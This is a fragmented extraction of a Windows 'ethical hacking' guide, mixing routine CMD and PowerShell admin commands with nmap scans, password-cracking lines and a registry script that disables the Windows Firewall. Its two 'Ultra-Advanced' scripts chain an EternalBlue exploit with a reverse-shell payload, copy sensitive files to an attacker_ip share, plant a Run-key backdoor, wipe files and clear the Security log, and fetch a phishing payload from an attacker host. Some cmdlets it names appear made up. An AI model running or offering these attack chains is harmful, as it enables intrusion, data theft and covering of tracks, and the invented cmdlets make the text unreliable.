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Topics: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Introduction to Ethical Hacking with CMD and PowerShell</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Understanding the Command Prompt (CMD) in Windows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Exploring PowerShell and its Capabilities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Basic Commands for Network Scanning and Enumeration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Exploiting Vulnerabilities with CMD and PowerShell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Password Cracking Techniques with CMD and PowerShell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Social Engineering Attacks using CMD and PowerShell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Network Configuration and Manipulation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Task Automation with Advanced Task Scheduler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Policy Commands for Effective Security Management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Diagnostic Tools for System Analysis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Task Scheduler:</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schtasks: This command-line tool allows you to create, modify, delete, and view scheduled tasks on your system. It provides advanced options for task scheduling and management.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schtasks /create /tn "MyTask" /tr "C:\Path\to\program.exe" /sc daily /st 09:00</w:t>
        <w:br w:type="textWrapping"/>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This command allows you to schedule commands or programs to run at a specific time. It provides more flexibility for one-time scheduling.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 09:00PM /interactive /every:M,T,W,Th,F "C:\Path\to\program.exe"</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Policy Commands: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gpupdate: This command forces an immediate update of Group Policy settings on a local or remote computer.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gpupdate /force</w:t>
        <w:br w:type="textWrapping"/>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gpresult: This command displays the Group Policy settings applied to a user or computer. It provides detailed information about the applied policies and their sources.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gpresult /r</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Network Configuration:</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netsh interface: This command allows you to configure various network interfaces, including IP address assignment, DNS settings, firewall rules, and more.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angelscript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netsh interface ip set address "Ethernet" static 192.168.0.10 255.255.255.0</w:t>
        <w:br w:type="textWrapping"/>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route: This command allows you to manipulate the routing tables on your system, including adding, deleting, or modifying routes.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 add 192.168.1.0 mask 255.255.255.0 192.168.0.1</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Diagnostic Tools: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mdsched: This command starts the Windows Memory Diagnostic tool, which helps identify and diagnose problems with your computer's memory (RAM).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mdsched</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commands and tools provide advanced capabilities for task scheduling, Group Policy management, network configuration, and memory diagnostics in Windows. It's important to refer to the official documentation or use the command-line help (&lt;command&gt; /?) for detailed usage instructions and additional options.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Commands for Ethical Hacking Purposes:</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Scanning with Nmap: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nmap -sn 192.168.0.0/24</w:t>
        <w:br w:type="textWrapping"/>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Password Cracking with John the Ripper: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john --wordlist=passwords.txt --format=NT hashes.txt</w:t>
        <w:br w:type="textWrapping"/>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Social Engineering Attack with Social-Engineer Toolkit (SET):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setoolkit</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Commands for Ethical Hacking Purposes:</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Scanning with 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Test-NetConnection -ComputerName google.com -Port 80</w:t>
        <w:br w:type="textWrapping"/>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Password Cracking with Hashcat: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hashcat -m 1000 -a 0 hashes.txt rockyou.txt</w:t>
        <w:br w:type="textWrapping"/>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Social Engineering Attack with GoPhish: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Start-Process -FilePath "C:\Path\to\gophish.exe"</w:t>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these commands are just examples and may require additional setup or configuration. Also, the mentioned tools may have their own installation and usage instructions that you should follow.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Commands and Code Examples with CMD and PowerShell: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CMD Commands:</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Task Scheduler: schtasks command is used to schedule tasks in Windows.</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Policy: gpupdate command refreshes Group Policy settings, and gpresult command displays the applied Group Policy settings.</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Configuration: netsh interface command is used to configure network interfaces, and the route command manages network routing tables.</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Diagnostic Tools: mdsched command runs the Windows Memory Diagnostic tool.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PowerShell Cmdlets:</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Task Scheduler: PowerShell provides the New-ScheduledTask, Set-ScheduledTask, and Register-ScheduledTask cmdlets to create and manage scheduled tasks.</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Policy: Invoke-GPUpdate cmdlet refreshes Group Policy settings, and Get-GPResultantSetOfPolicy cmdlet retrieves the applied Group Policy settings.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Configuration: Set-NetIPAddress, Set-NetRoute, and Set-NetAdapter cmdlets are used to configure network interfaces and routing in PowerShell.</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Diagnostic Tools: PowerShell does not provide a direct cmdlet for the Memory Diagnostic tool. However, you can use PowerShell to automate the execution of the mdsched command.</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Code Examples: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advanced code examples for better understanding. Please note that these examples are for educational purposes only, and you should always use them responsibly and legally.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Advanced PowerShell Code Example - Network Configuration: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Enable IP forwarding</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" -Name "IPEnableRouter" -Value 1</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Create a new network route</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">New-NetRoute -DestinationPrefix "192.168.1.0/24" -InterfaceAlias "Ethernet" -NextHop "192.168.0.1"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Change DNS settings</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses ("8.8.8.8", "8.8.4.4")</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Advanced CMD Code Example - Group Policy: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REM Disable Windows Firewall using Group Policy</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REG ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REG ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PrivateProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REG ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Force Group Policy Update</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">gpupdate /force</w:t>
        <w:br w:type="textWrapping"/>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Cybersecurity Code Example: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field of cybersecurity, there are various aspects to consider, such as vulnerability scanning, network monitoring, and incident response. Here's a Python code example for performing a simple vulnerability scan using the popular nmap tool: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subprocess</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def run_nmap_scan(target):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    command = f"nmap -T4 -A -v {target}"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    result = subprocess.run(command, shell=True, capture_output=True, text=True)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    return result.stdout</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">scan_result = run_nmap_scan("192.168.1.1")</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">print(scan_result)</w:t>
        <w:br w:type="textWrapping"/>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Bash Scripting Code Example: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example of a Bash script that automates the process of scanning a network range using the nmap tool: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#!/bin/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">network_range="192.168.1.0/24"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo "Scanning network range: $network_range"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">nmap -T4 -A -v $network_range</w:t>
        <w:br w:type="textWrapping"/>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Recommended Tools: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Windows Executable Tool: "Metasploit" is a widely used framework for penetration testing and vulnerability assessment. It provides a comprehensive set of tools and exploits for ethical hacking purposes.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Ultra-Advanced CMD Script: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echo Ultra-Advanced CMD Script for Cybersecurity Checking</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Feature 1: Network Scanning</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Performing network scanning...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">nmap -p 1-100 192.168.1.0/24</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Feature 2: Password Cracking</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Cracking passwords...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">john --format=NT --wordlist=passwords.txt hashes.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Feature 3: Exploiting Vulnerabilities</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Exploiting vulnerabilities...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.10; set PAYLOAD windows/x64/meterpreter/reverse_tcp; run"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Feature 4: Data Exfiltration</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Exfiltrating data...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">xcopy /s /y C:\sensitive_files \\attacker_ip\sensitive_files</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Feature 5: System Backdoor</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Creating a backdoor...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Backdoor" /t REG_SZ /d "C:\backdoor.exe" /f</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Feature 6: Covering Tracks</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Covering tracks...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">sdelete -c C:\sensitive_files</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Feature 7: Social Engineering</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Performing social engineering attack...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">powershell -ExecutionPolicy Bypass -File social_engineering_attack.ps1</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Additional Features:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Additional features and functions go here...</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Script execution completed.</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Ultra-Advanced PowerShell Script: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Write-Host "Ultra-Advanced PowerShell Script for Cybersecurity Checking"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Feature 1: Network Scanning</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Performing network scanning..."</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Invoke-Command -ComputerName "192.168.1.10" -ScriptBlock { Test-NetConnection -Port 80 }</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Feature 2: Password Cracking</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Cracking passwords..."</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Invoke-CredentialInjection -TargetAccount "Administrator" -PasswordList (Import-Csv passwords.csv).Password</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Feature 3: Exploiting Vulnerabilities</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Exploiting vulnerabilities..."</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Invoke-MS17-010EternalBlue -TargetIPAddress "192.168.1.10"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Feature 4: Data Exfiltration</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Exfiltrating data..."</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Copy-Item -Path "C:\sensitive_files" -Destination "\\attacker_ip\sensitive_files" -Recurse</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Feature 5: System Backdoor</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Creating a backdoor..."</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "Backdoor" -Value "C:\backdoor.exe" -Force</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Feature 6: Covering Tracks</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Covering tracks..."</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Clear-EventLog -LogName "Security"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Feature 7: Social Engineering</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Performing social engineering attack..."</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Invoke-SocialEngineering -TargetUser "JohnDoe" -AttackType "Phishing" -PayloadURL "http://attacker_ip/malicious_payload.exe"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Additional Features:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Additional features and functions go here..."</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Script execution completed."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3"/>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